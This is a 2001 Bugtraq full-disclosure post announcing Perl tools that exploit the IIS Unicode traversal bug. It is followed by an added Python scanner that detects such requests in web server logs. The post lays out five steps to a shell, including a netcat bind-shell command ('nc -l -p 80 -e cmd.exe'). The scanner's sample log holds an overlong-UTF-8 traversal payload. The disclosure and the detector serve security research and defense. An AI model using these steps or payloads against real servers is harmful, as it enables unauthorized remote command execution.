Bugtraq mailing list archives

shell on IIS server with Unicode using *only* HTTP


From: Roelof Temmingh <roelof () SENSEPOST COM>
Date: Thu, 25 Jan 2001 02:30:10 +0200

(assumes an IIS server vulnerable to the Unicode bug)

Tarball contains two PERL scripts:

1. Unicode upload creator (unicodeloader.pl)

 Works like this - two files (upload.asp and upload.inc - have
 them in the same dir as the PERL script) are built in the webroot
 (or anywhere else) using echo and some conversion strings.
 These files allow you to upload any file by
 simply surfing with a browser to the server.

 Typical use: (5 easy steps to a shell)
 1. Find the webroot (duh)
 2. perl unicodeloader target:80 'webroot'
 3. surf to target/upload.asp and upload nc.exe
 4. perl unicodexecute3.pl target:80 'webroot/nc -l -p 80 -e cmd.exe'
 5. telnet target 80

 Above procedure will drop you into a shell on the box
 without crashing the server (*winks at Eeye*).

 This procedure is nice for servers that are very tightly
 firewalled; servers that are not allowed to FTP, RCP or TFTP
 to the Internet.

2. Unicodexecute version3 (unicodexecute3.pl)
 same as before plus
 -includes searches for alternative executable dirs
 -more robust, stable than before
 -checks for access denied etc. added


Regards,
Roelof.

------------------------------------------------------
Roelof W Temmingh               SensePost IT security
roelof () sensepost com         +27 83 448 6996
                http://www.sensepost.com                

Attachment: unitools.tgz
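
Seen from the defending side, the procedure in the post above leaves traces in the web server's request log. The following is an added example, not part of the original post or of the unitools tarball: it flags request URIs that contain overlong (non-shortest-form) UTF-8 and requests for the two file names the post says the loader creates. The log layout, addresses and paths are constructed for illustration; `upload.asp` and `upload.inc` are the names given in the post.

```python
from urllib.parse import unquote_to_bytes

# Constructed sample log (assumed field order: date time c-ip method uri status).
SAMPLE_LOG = """\
2001-01-25 00:31:02 10.0.0.5 GET /default.asp 200
2001-01-25 00:31:09 10.0.0.5 GET /caf%C3%A9/menu.htm 200
2001-01-25 00:32:40 10.0.0.9 GET /scripts/..%c0%af../dir/file.exe 200
2001-01-25 00:33:15 10.0.0.9 GET /upload.asp 200
2001-01-25 00:33:58 10.0.0.9 POST /upload.asp 200
"""

def hidden_chars(raw: bytes):
    """Return the characters concealed by overlong UTF-8 sequences in raw.

    Lead bytes 0xC0/0xC1 never occur in valid UTF-8: they encode a 7-bit
    character in two bytes. 0xE0 followed by 0x80-0x9F is the three-byte
    form of a code point below U+0800 and is equally invalid.
    """
    out = []
    for i in range(len(raw) - 1):
        lead, nxt = raw[i], raw[i + 1]
        if lead in (0xC0, 0xC1) and 0x80 <= nxt <= 0xBF:
            out.append(chr(((lead & 0x1F) << 6) | (nxt & 0x3F)))
        elif (lead == 0xE0 and 0x80 <= nxt <= 0x9F
              and i + 2 < len(raw) and 0x80 <= raw[i + 2] <= 0xBF):
            out.append(chr(((nxt & 0x3F) << 6) | (raw[i + 2] & 0x3F)))
    return out

def scan(log_text, dropped=("upload.asp", "upload.inc")):
    """Return (client, rule, uri, detail) tuples for suspicious requests."""
    alerts = []
    for line in log_text.splitlines():
        if not line or line.startswith("#"):
            continue
        _date, _time, ip, method, uri, _status = line.split()
        raw = unquote_to_bytes(uri)          # percent-decode without validating
        hidden = hidden_chars(raw)
        if hidden:
            alerts.append((ip, "overlong-utf8", uri, "".join(hidden)))
        # A lead only: compare hits against the site's known file inventory.
        name = raw.lower().rsplit(b"/", 1)[-1].decode("latin-1")
        if name in dropped:
            alerts.append((ip, "dropped-file-request", uri, method))
    return alerts

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

The valid two-byte sequence in the second sample line is not flagged; only non-shortest-form encodings are, and the alert reports the character they conceal.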